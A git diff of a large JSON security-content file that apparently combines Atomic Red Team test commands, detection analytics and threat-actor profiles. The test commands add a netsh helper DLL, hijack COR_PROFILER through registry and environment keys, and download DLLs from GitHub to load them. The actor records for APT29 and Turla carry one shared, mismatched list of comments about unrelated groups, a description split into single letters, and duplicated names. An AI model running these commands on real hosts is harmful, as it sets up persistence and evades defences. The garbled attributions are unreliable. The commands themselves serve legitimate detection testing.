"commands": [], "queries": [], @@ -667494,12 +674416,12 @@ { "description": "Helper DLL must exist on disk at specified location (#{helper_file})\n", "prereq_command": "if (Test-Path \"#{helper_file}\") { exit 0} else { exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll\" -OutFile \"#{helper_file}\"\n" + "get_prereq_command": "New-Item -Type Directory (split-path \"#{helper_file}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll\" -OutFile \"#{helper_file}\"\n" } ], "executor": { - "command": "netsh.exe add helper #{helper_file}\ntaskkill /im notepad.exe /t /f > NUL 2>&1\n", - "cleanup_command": "netsh.exe delete helper #{helper_file}\n", + "command": "netsh.exe add helper \"#{helper_file}\"\ntaskkill /im notepad.exe /t /f > NUL 2>&1\n", + "cleanup_command": "netsh.exe delete helper \"#{helper_file}\"\n", "name": "command_prompt", "elevation_required": true } @@ -677879,18 +684801,11 @@ ], "observable": [ { - "name": "source.address", - "type": "User", + "name": "dest_domain", + "type": "IP Address", "role": [ "Attacker" ] - }, - { - "name": "destination{}.address", - "type": "User", - "role": [ - "Victim" - ] } ], "risk_score": 9, @@ -680434,8 +687349,8 @@ } ], "command_list": [ - "copy \\T1127\\src\\hello.js %TEMP%\\hello.js\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe %TEMP%\\hello.js\n", - "copy \\T1127\\src\\LibHello.js %TEMP%\\LibHello.js\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe /t:library %TEMP%\\LibHello.js\n", + "copy \"\\T1127\\src\\hello.js\" %TEMP%\\hello.js\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe %TEMP%\\hello.js\n", + "copy \"\\T1127\\src\\LibHello.js\" %TEMP%\\LibHello.js\nC:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\jsc.exe /t:library %TEMP%\\LibHello.js\n", "powershell/lateral_movement/invoke_executemsbuild", "powershell/code_execution/invoke_ntsd" ], @@ -680585,12 +687500,12 @@ "dependencies": [ { "description": "JavaScript code file must exist on disk at specified location (#{filename})\n", - "prereq_command": "if (Test-Path #{filename}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js\" -OutFile \"#{filename}\"\n" + "prereq_command": "if (Test-Path \"#{filename}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{filename}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js\" -OutFile \"#{filename}\"\n" } ], "executor": { - "command": "copy #{filename} %TEMP%\\hello.js\n#{jscpath}\\#{jscname} %TEMP%\\hello.js\n", + "command": "copy \"#{filename}\" %TEMP%\\hello.js\n#{jscpath}\\#{jscname} %TEMP%\\hello.js\n", "cleanup_command": "del %TEMP%\\hello.js\ndel %TEMP%\\hello.exe\n", "name": "command_prompt" } @@ -680623,12 +687538,12 @@ "dependencies": [ { "description": "JavaScript code file must exist on disk at specified location (#{filename})\n", - "prereq_command": "if (Test-Path #{filename}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js\" -OutFile \"#{filename}\"\n" + "prereq_command": "if (Test-Path \"#{filename}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{filename}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js\" -OutFile \"#{filename}\"\n" } ], "executor": { - "command": "copy #{filename} %TEMP%\\LibHello.js\n#{jscpath}\\#{jscname} /t:library %TEMP%\\LibHello.js\n", + "command": "copy \"#{filename}\" %TEMP%\\LibHello.js\n#{jscpath}\\#{jscname} /t:library %TEMP%\\LibHello.js\n", "cleanup_command": "del %TEMP%\\LibHello.js\ndel %TEMP%\\LibHello.dll\n", "name": "command_prompt" } @@ -680863,7 +687778,7 @@ { "name": "ETW Registry Disabled", "description": "This analytic is to detect a registry modification to disable ETW feature of windows. This technique is to evade EDR appliance to evade detections and hide its execution from audit logs.", - "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework*\" Registry.registry_value_name = ETWEnabled Registry.registry_value_data=0x00000000) BY _time span=1h Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `etw_registry_disabled_filter`", + "search": "| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry WHERE (Registry.registry_path=\"*\\\\SOFTWARE\\\\Microsoft\\\\.NETFramework*\" Registry.registry_value_name = ETWEnabled Registry.registry_value_data=0x00000000) BY _time span=1h Registry.dest Registry.user Registry.registry_path Registry.registry_key_name Registry.registry_value_name Registry.registry_value_data Registry.process_guid | `drop_dm_object_name(Registry)` | where isnotnull(registry_value_data) | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `etw_registry_disabled_filter`", "tags": { "name": "ETW Registry Disabled", "analytic_story": [ @@ -680880,7 +687795,7 @@ "kill_chain_phases": [ "Exploitation" ], - "message": "modified/added/deleted registry entry $Registry.registry_path$ in $dest$", + "message": "Modified/added/deleted registry entry $registry_path$ in $dest$", "mitre_attack_id": [ "T1562.006", "T1127", @@ -680971,7 +687886,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -681131,7 +688046,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -681193,7 +688108,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -681399,7 +688314,7 @@ ] }, { - "name": "User", + "name": "user", "type": "User", "role": [ "Victim" @@ -683699,9 +690614,9 @@ } ], "command_list": [ - "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\\InprocServer32\" -Value \\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value \\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", - "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value \\T1574.012\\bin\\T1574.012x64.dll -Force | Out-Null\n", - "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '{09108e71-974c-4010-89cb-acf471ae9e2c}'\n$env:COR_PROFILER_PATH = '\\T1574.012\\bin\\T1574.012x64.dll'\nPOWERSHELL -c 'Start-Sleep 1'\n" + "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\{09108e71-974c-4010-89cb-acf471ae9e2c}\\InprocServer32\" -Value \"\\T1574.012\\bin\\T1574.012x64.dll\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value \"\\T1574.012\\bin\\T1574.012x64.dll\" -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"{09108e71-974c-4010-89cb-acf471ae9e2c}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value \"\\T1574.012\\bin\\T1574.012x64.dll\" -Force | Out-Null\n", + "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '{09108e71-974c-4010-89cb-acf471ae9e2c}'\n$env:COR_PROFILER_PATH = '\"\\T1574.012\\bin\\T1574.012x64.dll\"'\nPOWERSHELL -c 'Start-Sleep 1'\n" ], "commands": [], "queries": [], @@ -683735,13 +690650,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "#{file_name} must be present\n", - "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" + "description": "\"#{file_name}\" must be present\n", + "prereq_command": "if (Test-Path \"#{file_name}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{file_name}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" } ], "executor": { - "command": "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\#{clsid_guid}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\\InprocServer32\" -Value #{file_name} -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", + "command": "Write-Host \"Creating registry keys in HKCU:Software\\Classes\\CLSID\\#{clsid_guid}\" -ForegroundColor Cyan\nNew-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\\InprocServer32\" -Value \"#{file_name}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -PropertyType String -Value \"#{file_name}\" -Force | Out-Null\nWrite-Host \"executing eventvwr.msc\" -ForegroundColor Cyan\nSTART MMC.EXE EVENTVWR.MSC\n", "cleanup_command": "Remove-Item -Path \"HKCU:\\Software\\Classes\\CLSID\\#{clsid_guid}\" -Recurse -Force -ErrorAction Ignore \nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path HKCU:\\Environment -Name \"COR_PROFILER_PATH\" -Force -ErrorAction Ignore | Out-Null\n", "name": "powershell" } @@ -683768,13 +690683,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "#{file_name} must be present\n", - "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" + "description": "\"#{file_name}\" must be present\n", + "prereq_command": "if (Test-Path \"#{file_name}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{file_name}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" } ], "executor": { - "command": "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value #{file_name} -Force | Out-Null\n", + "command": "Write-Host \"Creating system environment variables\" -ForegroundColor Cyan\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -PropertyType String -Value \"1\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -PropertyType String -Value \"#{clsid_guid}\" -Force | Out-Null\nNew-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -PropertyType String -Value \"#{file_name}\" -Force | Out-Null\n", "cleanup_command": "Remove-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_ENABLE_PROFILING\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER\" -Force -ErrorAction Ignore | Out-Null\nRemove-ItemProperty -Path 'HKLM:\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment' -Name \"COR_PROFILER_PATH\" -Force -ErrorAction Ignore | Out-Null\n", "name": "powershell", "elevation_required": true @@ -683802,13 +690717,13 @@ "dependency_executor_name": "powershell", "dependencies": [ { - "description": "#{file_name} must be present\n", - "prereq_command": "if (Test-Path #{file_name}) {exit 0} else {exit 1}\n", - "get_prereq_command": "New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" + "description": "\"#{file_name}\" must be present\n", + "prereq_command": "if (Test-Path \"#{file_name}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path \"#{file_name}\") -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1574.012/bin/T1574.012x64.dll\" -OutFile \"#{file_name}\"\n" } ], "executor": { - "command": "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '#{clsid_guid}'\n$env:COR_PROFILER_PATH = '#{file_name}'\nPOWERSHELL -c 'Start-Sleep 1'\n", + "command": "$env:COR_ENABLE_PROFILING = 1\n$env:COR_PROFILER = '#{clsid_guid}'\n$env:COR_PROFILER_PATH = '\"#{file_name}\"'\nPOWERSHELL -c 'Start-Sleep 1'\n", "cleanup_command": "$env:COR_ENABLE_PROFILING = 0\n$env:COR_PROFILER = ''\n$env:COR_PROFILER_PATH = ''\n", "name": "powershell" } @@ -1137365,18 +1144280,110 @@ "external_id": "033fe7d6-66d1-4240-ac6b-28908009c71f" } ], - "names": [], - "external_tools": [], + "names": [ + "APT29", + "Dukes", + "Group 100", + "Cozy Duke", + "EuroAPT", + "Cozy Bear", + "CozyCar", + "Cozer", + "Office Monkeys / TEMP.Monkeys", + "Minidionis", + "SeaDuke", + "Hammer Toss", + "Fritillary, Yttrium, StellarParticle, UNC3524, Cranefly", + "G0016", + "IRON HEMLOCK" + ], + "external_tools": [ + "Hammertoss", + "OnionDuke", + "CosmicDuke", + "MiniDuke", + "CozyDuke", + "SeaDuke", + "SeaDaddy implant developed in Python and compiled with py2exe", + "AdobeARM", + "ATI-Agent", + "MiniDionis", + "Grizzly Steppe", + "Vernaldrop", + "Tadpole", + "Spikerush", + "POSHSPY", + "PolyglotDuke", + "RegDuke", + "FatDuke" + ], "country": [], "operations": [], - "links": [], - "targets": [], + "links": [ + "https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2015/apt29-hammertoss-stealthy-tactics-define-a.pdf", + "https://labsblog.f-secure.com/2015/09/17/the-dukes-7-years-of-russian-cyber-espionage/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf", + "http://www.volexity.com/blog/", + "https://www.us-cert.gov/sites/default/files/publications/AR-17-20045_Enhanced_Analysis_of_GRIZZLY_STEPPE_Activity.pdf", + "https://www2.fireeye.com/rs/848-DID-242/images/RPT-M-Trends-2017.pdf", + "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", + "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html", + "https://securelist.com/the-cozyduke-apt/69731/", + "https://www.welivesecurity.com/2019/10/17/operation-ghost-dukes-never-left/", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-105a", + "https://www.istrosec.com/blog/apt-sk-cobalt/", + "https://cybergeeks.tech/how-to-defeat-the-russian-dukes-a-step-by-step-analysis-of-miniduke-used-by-apt29-cozy-bear/", + "https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/", + "https://www.mandiant.com/resources/blog/apt29-continues-targeting-microsoft", + "https://cluster25.io/2022/05/13/cozy-smuggled-into-the-box/", + "https://www.mandiant.com/resources/blog/unc3524-eye-spy-email", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cranefly-new-tools-technique-geppei-danfuan" + ], + "targets": [ + "This threat actor targets government ministries and agencies in Europe, the US, Central Asia, East Africa, and the Middle East, associated with DNC attacks" + ], "external_description": [ + "p", + "h", + "i", + "s", + "h", + "i", + "n", + "g", + " ", + "e", + "m", + "a", + "i", + "l", + "s", "This method detects a suspicious powershell command line combination as used by APT29 in a campaign against US think tanks" ], "attck_id": "", "attck_ids": [], - "comment": "", + "comment": [ + "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy", + "Active campaign post 2016 US presidential election", + "Turla also uses OilRig's (APT34) implants ", + "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly", + "Linked to Kiev Dec2016 ICS cyberattack", + "Overlaps with Carbanak (but not the same group)", + "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto", + "During Ukrainian Revolution", + "Associated with Turla", + "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017", + "Operates from Union State & Ukraine", + "Corporate espionage and theft of documents", + "High sophistication, overlap to APT29, SVR, YTTRIUM", + "Overlap w/Gamaredon", + "Former Conti and other groups around Wizard Spider", + "They are again active since November 2022 attacking Medibank in Australia", + "NorthKorea vs Samsung", + "Overlap EvilCorp", + "Overlap Cuba ransomware TA" + ], "comments": [] }, { @@ -1137756,16 +1144763,104 @@ "description": "WhiteBear is a designation used by Securelist to describe a cluster of activity that has overlaps with activity described by others as Turla, but appears to have a separate focus.(Citation: Securelist WhiteBear Aug 2017)(Citation: Talos TinyTurla September 2021)" } ], - "names": [], - "external_tools": [], + "names": [ + "Turla Group ", + "Snake", + "Venomous Bear", + "Group 88", + "Waterbug", + "Turla Team", + "Krypton", + "Uroburos", + "SIG23", + "MAKERSMARK", + "ITG12", + "SUMMIT,\u00d0\u00a2\u00d1\u0083\u00d1\u0080\u00d0\u00bb\u00d0\u00b0", + "UNC4210,Blue Python,ATK13,Pfinet,TAG_0530,Pacifier APT,Popeye", + "G0010", + "IRON HUNTER" + ], + "external_tools": [ + "systeminfo", + "net", + "tasklist", + "gpresult", + "wce", + "pwdump", + "Uroburos", + "Turla", + "Agent.BTZ", + "Tavdig", + "Wipbot", + "Agent.dne", + "AdobeARM", + "ATI-Agent", + "MiniDionis", + "WhiteBear", + "Gazer", + "Neuron", + "Nautilus" + ], "country": [], "operations": [], - "links": [], - "targets": [], + "links": [ + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://securelist.com/blog/research/72081/satellite-turla-apt-command-and-control-in-the-sky/", + "https://securelist.com/blog/research/67962/the-penquin-turla-2/", + "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf", + "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/", + "https://securelist.com/kopiluwak-a-new-javascript-payload-from-turla/77429/", + "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", + "https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/", + "https://www.govcert.admin.ch/blog/22/technical-report-about-the-ruag-espionage-case", + "http://www.sueddeutsche.de/digital/it-sicherheit-einbrechen-ausbreiten-abgreifen-1.3887843", + "https://www.welivesecurity.com/2018/05/22/turla-mosquito-shift-towards-generic-tools/", + "https://www.ncsc.gov.uk/alerts/turla-group-malware", + "https://motherboard.vice.com/en_us/article/vvk83b/moonlight-maze-turla-link", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180251/Penquins_Moonlit_Maze_PDF_eng.pdf", + "https://www.wired.com/2017/04/russian-hackers-used-backdoor-two-decades/", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-march-venomous-bear/", + "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments", + "https://securelist.com/turla-renews-its-arsenal-with-topinambour/91687/", + "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", + "https://twitter.com/lehtior2/status/893085897226412036", + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims", + "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0", + "https://cybergeeks.tech/a-step-by-step-analysis-of-the-russian-apt-turla-backdoor-called-tinyturla/", + "https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/", + "https://blog.sekoia.io/turla-new-phishing-campaign-eastern-europe/", + "https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/", + "https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims" + ], + "targets": [ + "Targeting several governments and sensitive businesses such as the defense industry" + ], "external_description": [], "attck_id": "", "attck_ids": [], - "comment": "", + "comment": [ + "Called out by DHS & FBI as responsible for cyber attacks associated with US election 2016.Allegedly attributed the first UEFI rootkit seen in the wild: LoJax (2018), Overlaps with Zebrocy", + "Active campaign post 2016 US presidential election", + "Turla also uses OilRig's (APT34) implants ", + "Detected in Middle East networks in 2014, Compromise via spear phish or SWC, Motivation somewhat unclear; CrowdStrike lists Berserk Bear as separate group (evolution of Energetic) while Symantec sees Energetic Bear and Berserk Bear as single group named Dragonfly", + "Linked to Kiev Dec2016 ICS cyberattack", + "Overlaps with Carbanak (but not the same group)", + "Hijack infrastructure of Iranian APT33, APT35 & Muddywater, overlap to Callisto", + "During Ukrainian Revolution", + "Associated with Turla", + "TTP indicates possibly TA505 Microsoft Security Intelligence and McAfee Teams have affiliated TA505 with SectorJ04 aka Evil Corp aka Dudear since 2014 - reference in Link2 Department of Justice issues warrant for arrest of Dridex member, whom is working for Russian FSB since 2017", + "Operates from Union State & Ukraine", + "Corporate espionage and theft of documents", + "High sophistication, overlap to APT29, SVR, YTTRIUM", + "Overlap w/Gamaredon", + "Former Conti and other groups around Wizard Spider", + "They are again active since November 2022 attacking Medibank in Australia", + "NorthKorea vs Samsung", + "Overlap EvilCorp", + "Overlap Cuba ransomware TA" + ], "comments": [] }, { @@ -1140211,6 +1147306,14 @@ } ], "names": [ + "TA505", + "CHIMBORAZO", + "SectorJ04", + "Dudear", + "Spandex Tempest", + "ATK103", + "Hive0065", + "G0092", "Indrik Spider", "TA505", "SectorJ04", @@ -1140223,6 +1147326,12 @@ "G0092" ], "external_tools": [ + "Dridex", + "The Trick", + "Locky", + "Jaff", + "FlawedAmmyy", + "GraceWire malicious software signed with valid digital signatures", "Dridex", "FlawedAmmyy", "Remote Manipulator System", @@ -1140233,6 +1147342,10 @@ "country": [], "operations": [], "links": [ + "https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/", + "https://www.bankinfosecurity.com/ta505-apt-group-returns-new-techniques-report-a-13678", + "https://www.databreachtoday.com/two-russians-indicted-over-100m-dridex-malware-thefts-a-13473", + "https://www.mcafee.com/enterprise/en-us/threat-center/threat-landscape-dashboard/campaigns-details.operation-sectorj04-2019.html", "https://www.sig-switzerland.ch/wp-content/uploads/2016/03/SIGS_SOC_Forum_Sep2017_CrowdStrike_On_the_Hunt_for_Pandas_Kittens_and_Bears.pdf see slide 15", "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/", "https://ti.360.net/blog/articles/excel-4.0-macro-utilized-by-ta505-to-target-financial-institutions-recently-en/", @@ -1140484,16 +1147597,98 @@ "description": "UK Gov. (2022, April 5). Russia's FSB malign activity: factsheet. Retrieved April 5, 2022." } ], - "names": [], - "external_tools": [], + "names": [ + "Energetic Bear", + "Dragonfly", + "Crouching Yeti", + "Group 24", + "Koala Team", + "Berserk Bear", + "Anger Bear", + "Dymalloy", + "Havex", + "PEACEPIPE", + "Fertger", + "TEMP.Isotope", + "Blue Kraken,ITG15,BROMINE,Ghost Blizzard,ATK6", + "G0035", + "IRON LIBERTY" + ], + "external_tools": [ + "Havex RAT", + "Oldrea", + "LightsOut ExploitKit", + "Inveigh", + "PsExec", + "Persistence through .LNK file manipulations", + "Nmap", + "Dirsearch", + "Sqlmap", + "Sublist3r", + "Wpscan", + "Impacket", + "SMBTrap", + "Commix", + "Subbrute", + "PHPMailer", + "Web Shells (PHP)", + "MCMD" + ], "country": [], "operations": [], - "links": [], - "targets": [], - "external_description": [], + "links": [ + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/Dragonfly_Threat_Against_Western_Energy_Suppliers.pdf", + "http://www.netresec.com/?page=Blog&month=2014-10&post=Full-Disclosure-of-Havex-Trojans", + "https://threatpost.com/energy-watering-hole-attack-used-lightsout-exploit-kit/104772/", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", + "https://securelist.com/blog/incidents/35520/the-teamspy-crew-attacks-abusing-teamviewer-for-cyberespionage-8/", + 